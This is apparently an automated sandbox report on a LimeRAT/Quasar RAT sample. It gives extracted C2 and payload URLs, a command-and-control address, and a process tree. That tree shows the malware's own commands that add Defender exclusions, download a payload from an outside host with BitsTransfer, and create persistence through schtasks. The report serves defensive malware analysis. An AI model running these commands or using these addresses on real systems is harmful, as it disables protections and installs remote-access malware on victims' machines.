limerat | 7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8

Analysis

max time kernel
143s
max time network
156s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
07-07-2023 12:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe
Size

54.1MB
MD5

e1c8233b71f5b4befa0605a036c2439f
SHA1

3c1ed3b56c662706f8817e62cd2f9c4466596d9a
SHA256

7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8
SHA512

bbc838a69879244c0b28c539b35e448deae0debbab5137f03f4fc162238a4562552b994d92951e4a97f2f013d1c7ab1e137a164d459697be9a2999e9ae00bd1e
SSDEEP

786432:xp3IN1FZQYnnkx9APJ/5AqcP5fd+CjamTb6DRg8n6+JyknHomZ4CmCVC6t7XBhMH:x1IgYeAPJ/WqcpoCjHb6h6+JybD62cjW

Score

10^/10

limerat quasar windows control center rat spyware trojan

Malware Config

Extracted

Family

limerat

Wallets

3MepjwQmfUhgUQgHqveCiWqdBpJNkLQHFn

Attributes

aes_key
password@
antivm
false
c2_url
https://pastebin.com/raw/h0JAB92p
delay
3
download_payload
true
install
true
install_name
MicrosoftWindowsServer.exe
main_folder
AppData
payload_url
https://github.com/willskate548/192/raw/main/WindowsControlCenter.exe
pin_spread
false
sub_folder
\MWS\
usb_spread
false

Extracted

Family

quasar

Version

1.4.1

Botnet

Windows Control Center

5.78.110.192:6050

Mutex

f1c23f2d-02a2-44d2-92e0-6e25022fa246

Attributes

encryption_key
420F8C6982C226E94D8F49F3A9F975BFE047EFD7
install_name
WindowsControlCenter.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Control Center
subdirectory
WCC

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 6 IoCs

resource	yara_rule
behavioral1/files/0x000600000001af9a-784.dat	family_quasar
behavioral1/files/0x000600000001af9a-785.dat	family_quasar
behavioral1/memory/1316-786-0x00000000008B0000-0x0000000000BD4000-memory.dmp	family_quasar
behavioral1/files/0x000600000001af9c-789.dat	family_quasar
behavioral1/files/0x000600000001af9c-791.dat	family_quasar
behavioral1/files/0x000600000001af9c-793.dat	family_quasar

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
3976	MicrosoftWindowsServer.exe
1316	tmp2D26.tmpWindowsControlCenter.exe
5116	WindowsControlCenter.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4336	schtasks.exe
1728	schtasks.exe
4284	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
3772	powershell.exe
3772	powershell.exe
3772	powershell.exe
3636	powershell.exe
3636	powershell.exe
3636	powershell.exe
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe
2132	powershell.exe
2132	powershell.exe
2132	powershell.exe
5064	powershell.exe
5064	powershell.exe
5064	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
3124	powershell.exe
3124	powershell.exe
3124	powershell.exe
2904	powershell.exe
2904	powershell.exe
2904	powershell.exe
1404	powershell.exe
1404	powershell.exe
1404	powershell.exe
5112	powershell.exe
5112	powershell.exe
5112	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
2344	powershell.exe
2344	powershell.exe
2344	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeIncreaseQuotaPrivilege	3772	powershell.exe
Token: SeSecurityPrivilege	3772	powershell.exe
Token: SeTakeOwnershipPrivilege	3772	powershell.exe
Token: SeLoadDriverPrivilege	3772	powershell.exe
Token: SeSystemProfilePrivilege	3772	powershell.exe
Token: SeSystemtimePrivilege	3772	powershell.exe
Token: SeProfSingleProcessPrivilege	3772	powershell.exe
Token: SeIncBasePriorityPrivilege	3772	powershell.exe
Token: SeCreatePagefilePrivilege	3772	powershell.exe
Token: SeBackupPrivilege	3772	powershell.exe
Token: SeRestorePrivilege	3772	powershell.exe
Token: SeShutdownPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeSystemEnvironmentPrivilege	3772	powershell.exe
Token: SeRemoteShutdownPrivilege	3772	powershell.exe
Token: SeUndockPrivilege	3772	powershell.exe
Token: SeManageVolumePrivilege	3772	powershell.exe
Token: 33	3772	powershell.exe
Token: 34	3772	powershell.exe
Token: 35	3772	powershell.exe
Token: 36	3772	powershell.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeIncreaseQuotaPrivilege	3636	powershell.exe
Token: SeSecurityPrivilege	3636	powershell.exe
Token: SeTakeOwnershipPrivilege	3636	powershell.exe
Token: SeLoadDriverPrivilege	3636	powershell.exe
Token: SeSystemProfilePrivilege	3636	powershell.exe
Token: SeSystemtimePrivilege	3636	powershell.exe
Token: SeProfSingleProcessPrivilege	3636	powershell.exe
Token: SeIncBasePriorityPrivilege	3636	powershell.exe
Token: SeCreatePagefilePrivilege	3636	powershell.exe
Token: SeBackupPrivilege	3636	powershell.exe
Token: SeRestorePrivilege	3636	powershell.exe
Token: SeShutdownPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeSystemEnvironmentPrivilege	3636	powershell.exe
Token: SeRemoteShutdownPrivilege	3636	powershell.exe
Token: SeUndockPrivilege	3636	powershell.exe
Token: SeManageVolumePrivilege	3636	powershell.exe
Token: 33	3636	powershell.exe
Token: 34	3636	powershell.exe
Token: 35	3636	powershell.exe
Token: 36	3636	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeIncreaseQuotaPrivilege	2256	powershell.exe
Token: SeSecurityPrivilege	2256	powershell.exe
Token: SeTakeOwnershipPrivilege	2256	powershell.exe
Token: SeLoadDriverPrivilege	2256	powershell.exe
Token: SeSystemProfilePrivilege	2256	powershell.exe
Token: SeSystemtimePrivilege	2256	powershell.exe
Token: SeProfSingleProcessPrivilege	2256	powershell.exe
Token: SeIncBasePriorityPrivilege	2256	powershell.exe
Token: SeCreatePagefilePrivilege	2256	powershell.exe
Token: SeBackupPrivilege	2256	powershell.exe
Token: SeRestorePrivilege	2256	powershell.exe
Token: SeShutdownPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeSystemEnvironmentPrivilege	2256	powershell.exe
Token: SeRemoteShutdownPrivilege	2256	powershell.exe
Token: SeUndockPrivilege	2256	powershell.exe
Token: SeManageVolumePrivilege	2256	powershell.exe
Token: 33	2256	powershell.exe
Token: 34	2256	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5116	WindowsControlCenter.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2564 wrote to memory of 2552	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	70
PID 2564 wrote to memory of 2552	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	70
PID 2552 wrote to memory of 2608	2552	cmd.exe	71
PID 2552 wrote to memory of 2608	2552	cmd.exe	71
PID 2564 wrote to memory of 3724	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	72
PID 2564 wrote to memory of 3724	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	72
PID 3724 wrote to memory of 3772	3724	cmd.exe	73
PID 3724 wrote to memory of 3772	3724	cmd.exe	73
PID 2564 wrote to memory of 1524	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	75
PID 2564 wrote to memory of 1524	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	75
PID 1524 wrote to memory of 3636	1524	cmd.exe	76
PID 1524 wrote to memory of 3636	1524	cmd.exe	76
PID 2564 wrote to memory of 3608	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	77
PID 2564 wrote to memory of 3608	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	77
PID 3608 wrote to memory of 2256	3608	cmd.exe	78
PID 3608 wrote to memory of 2256	3608	cmd.exe	78
PID 2564 wrote to memory of 3920	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	79
PID 2564 wrote to memory of 3920	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	79
PID 3920 wrote to memory of 2132	3920	cmd.exe	80
PID 3920 wrote to memory of 2132	3920	cmd.exe	80
PID 2564 wrote to memory of 5032	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	81
PID 2564 wrote to memory of 5032	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	81
PID 5032 wrote to memory of 5064	5032	cmd.exe	82
PID 5032 wrote to memory of 5064	5032	cmd.exe	82
PID 2564 wrote to memory of 2736	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	83
PID 2564 wrote to memory of 2736	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	83
PID 2736 wrote to memory of 4868	2736	cmd.exe	84
PID 2736 wrote to memory of 4868	2736	cmd.exe	84
PID 2564 wrote to memory of 1292	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	85
PID 2564 wrote to memory of 1292	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	85
PID 1292 wrote to memory of 3124	1292	cmd.exe	86
PID 1292 wrote to memory of 3124	1292	cmd.exe	86
PID 2564 wrote to memory of 4564	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	87
PID 2564 wrote to memory of 4564	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	87
PID 4564 wrote to memory of 2904	4564	cmd.exe	88
PID 4564 wrote to memory of 2904	4564	cmd.exe	88
PID 2564 wrote to memory of 3976	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	89
PID 2564 wrote to memory of 3976	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	89
PID 3976 wrote to memory of 1404	3976	cmd.exe	90
PID 3976 wrote to memory of 1404	3976	cmd.exe	90
PID 2564 wrote to memory of 784	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	91
PID 2564 wrote to memory of 784	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	91
PID 784 wrote to memory of 5112	784	cmd.exe	92
PID 784 wrote to memory of 5112	784	cmd.exe	92
PID 2564 wrote to memory of 508	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	93
PID 2564 wrote to memory of 508	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	93
PID 508 wrote to memory of 4416	508	cmd.exe	94
PID 508 wrote to memory of 4416	508	cmd.exe	94
PID 2564 wrote to memory of 2228	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	95
PID 2564 wrote to memory of 2228	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	95
PID 2228 wrote to memory of 2344	2228	cmd.exe	96
PID 2228 wrote to memory of 2344	2228	cmd.exe	96
PID 2564 wrote to memory of 4192	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	99
PID 2564 wrote to memory of 4192	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	99
PID 2564 wrote to memory of 4192	2564	7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe	99
PID 4192 wrote to memory of 4336	4192	MicrosoftWindowsServer.exe	101
PID 4192 wrote to memory of 4336	4192	MicrosoftWindowsServer.exe	101
PID 4192 wrote to memory of 4336	4192	MicrosoftWindowsServer.exe	101
PID 4192 wrote to memory of 3976	4192	MicrosoftWindowsServer.exe	103
PID 4192 wrote to memory of 3976	4192	MicrosoftWindowsServer.exe	103
PID 4192 wrote to memory of 3976	4192	MicrosoftWindowsServer.exe	103
PID 3976 wrote to memory of 1316	3976	MicrosoftWindowsServer.exe	104
PID 3976 wrote to memory of 1316	3976	MicrosoftWindowsServer.exe	104
PID 1316 wrote to memory of 1728	1316	tmp2D26.tmpWindowsControlCenter.exe	105

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe
"C:\Users\Admin\AppData\Local\Temp\7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe" "%AppData%\7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe" > nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\system32\cmd.exe
    cmd /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe" "C:\Users\Admin\AppData\Roaming\7a0fa7427224a98c57c65175eff4d069d4776e8aa3e2ba84f1ac53c169548ae8.exe"
    3⤵
    PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath '%temp%'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath '%AppData%'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath '%AppData%\Roaming\WCC\WindowsControlCenter.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Roaming\WCC\WindowsControlCenter.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath '%AppData%\Roaming\MWS\MicrosoftWindowsServer.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Roaming\MWS\MicrosoftWindowsServer.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\MicrosoftWindowsServer.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\MicrosoftWindowsServer.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Windows Control Center.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Windows Control Center.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\MicrosoftWindowsServer.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\MicrosoftWindowsServer.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -Command "Start-BitsTransfer -Priority foreground -Source 'https://github.com/willskate548/192/raw/main/MicrosoftWindowsServer.exe' -Destination 'C:\Users\Admin\AppData\Roaming\MicrosoftWindowsServer.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Start-BitsTransfer -Priority foreground -Source 'https://github.com/willskate548/192/raw/main/MicrosoftWindowsServer.exe' -Destination 'C:\Users\Admin\AppData\Roaming\MicrosoftWindowsServer.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2344
- C:\Users\Admin\AppData\Roaming\MicrosoftWindowsServer.exe
  C:\Users\Admin\AppData\Roaming\MicrosoftWindowsServer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4192
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\MWS\MicrosoftWindowsServer.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:4336
- - C:\Users\Admin\AppData\Roaming\MWS\MicrosoftWindowsServer.exe
    "C:\Users\Admin\AppData\Roaming\MWS\MicrosoftWindowsServer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Users\Admin\AppData\Local\Temp\tmp2D26.tmpWindowsControlCenter.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp2D26.tmpWindowsControlCenter.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1316
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Control Center" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WCC\WindowsControlCenter.exe" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:1728
    - - C:\Users\Admin\AppData\Roaming\WCC\WindowsControlCenter.exe
        
        "C:\Users\Admin\AppData\Roaming\WCC\WindowsControlCenter.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5116
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Control Center" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WCC\WindowsControlCenter.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:4284

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MicrosoftWindowsServer.exe.log

Filesize
709B

MD5
f49074d03bf7a1147e09523a879f96e5

SHA1
c0296087924e258a80bd85cc351370becde0d8cf

SHA256
6b2164baa4e0fe1e3b0fe1094483d2f28a73694e4b0e07c03a90b01ffe582c65

SHA512
bfbbd8881c2df740997613d08e8e582cd9788b91fbcc3c06c196c0acc1a20109cd94e987b8f08fd2fc396d377dd6d7dc4144877f996db2c7bd97ac0c9a300648

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b6c77a89b52a91d9a5943cdcc73ea2b6

SHA1
58c3c3243ec0eeae2c428cf3ea711a7561fd4545

SHA256
7b93d21d57e318e9d5501ea85f3f6111912bf1e21a6cb8cb0cd997078c958a55

SHA512
6df851ebd97420b056255e00fdc2f797f34f8075bab36226b9342e32d53a7c3fb8216d3a79ddea0130e5830b6289376cabd8668e0bad309e00ec8ff01b5765da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
45bf2d412dd6a5f7343e1e8c2ad04f29

SHA1
6d6ca3ae8f0f023e496356e5a0218d15e4a28027

SHA256
32b9278e09e25dc7dec8d952f1452fad1fb08f5c57a43fa859caa2331d6fac58

SHA512
f4f43bb8153d08232b8236547a8b193b4f840ad0e6d2a677c05b08db0d08c322536990b04d531a824aca69d8a0be070136a9c00583b73e011551b243bbc968b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1da779013d16f3a80d4cf59f1f456147

SHA1
1fc12e3360a7244cb9620637d68983a47491240c

SHA256
8b6142df1fd333bd8217a7547202b0b2a8bd16d401bc15f14e7138187a018fe5

SHA512
008576695465040858dda3bb3a1d0d939a7ded53106d176232212481c20f65100638ffef722aefa6454644d3d316ce51de01538a8aec12aac78287300cc12a31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f82ca315a8ca75ebbe476e8a56c2d165

SHA1
67d84a2b662f414347ce52ecaa19ab030d844969

SHA256
71f0c4e76988395d7f3fd506cda295f285ca222cc5a07a5fbbe95591e5cc4b59

SHA512
792cb37dfa915f80eaa1006f546223edd0aac8f235d4894bb15d93e624ed7d416cb8b72e7585fbe0f3b1674cad2f23637573dc4455c67aea486d9749a2203063

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5295b4eda3966ce4792f187c5aec0245

SHA1
11bc2a075e6d5b7a40b8cd33e00fa93508828d56

SHA256
6bce67c006ce1b6cde9638e558d49fea5532fb78e04ed50f875efce978d15ded

SHA512
c25048223fc285533ddfee08e6c6e5ccb4d75e712a94ac716597a62a936bc8cb8bd86489f39c2a5f8033df479a2419434000c63334258a4f2d54e5310a7bdc62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
72f88a5f486c3afb8584dfc90626105e

SHA1
c4b4b1a3ffd4cb8863dc373e48a6e46a3e1eac6c

SHA256
58b3de17f5b5f8afd766a868ff4756e7a283a6faf1ff1ade2cb2cf41b5f95a22

SHA512
48090d01974cf47927e4b170465e94d07b9a7022e12ed5669b21c741a1fc8fd834bc33666ea9d6f2de9bcab1be43d92d7984a22b359a3fa802f22b08ecda3f79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
02eed77f58e8531df0f5d366d9d9c0dc

SHA1
de18a76a00acc24be1dc574983f51df53cd2e504

SHA256
ebbd0f22721fc8d9c107ba5a2c2cf9d8d21493c1e11c0fa3735b022c27351423

SHA512
17d8ab78c6a70e719c947e56acf41b270e52d2cbfc3f2062294d3ba39e23ae76f1af1507afd9d5440dbba9084514b998ea30ab653ea01002f1b03cc42ea722b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
32d86e406de0c37476b23360b27f45c3

SHA1
70a79896bcfca99a60e0ca3c560abb7184394bb9

SHA256
41a52282214f82e92e5bed7473781b0507f4e95c0bddcafaeae0662568efc90a

SHA512
89d87017887388ac7639dedb876ad6baec057104f584b6a1062c14d748279a228d64559cdcfd06101256c30496bc7fe7b014eab01e2c52fe61617d0d56efd779

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
041e33cd3678cac27b7d71d6f369443d

SHA1
483135c8a2e787895280dabf6ef2a379c12c525e

SHA256
85d21dc883eee919283c7163917620094716efa203fbe4a083a50e79a062b7ab

SHA512
5aa56f41002334ce083ad8a999f4e26aa5cf59f53d6e5e41cdc90b2dadcb4b66629ef41a0175613d79ad920eb5eb50bc7e0fee0acc0826b2751afda6b3c51d29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
212f4962ecdf6d20493c94712af56915

SHA1
4c7d52ba6cd262313bf417ce7af21cdbc1d7da6b

SHA256
ee6074ca2d48c2fef94943ae38ec71b955bd9e8124d3e6c5f06ab71e9f6ebb3d

SHA512
9ce51b69cf7b4bd39b4eea303c6fd29cfe7e338eda3589e4012ccb853daa908c29660c89423f401ffc032c4098c2cfc5c77571a09c742608937781e01e938050

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6eca6326c65a6185af640215ae4f774a

SHA1
277ffc3b40a4fbee9e8c8dd1a8684ace725facfd

SHA256
f7fdf942632826af56736faad6aca2c77b857dde50f7689b5e3edfab72c1ec81

SHA512
9c96f89e8de9afbdced5f131275f86034c1de1e0f090fdee7487cfc6fe9f036d88d4ce27a01f0dcb1dc401ab7830feefeb340aac1904f5ae8e027037a2606430

Download Submit
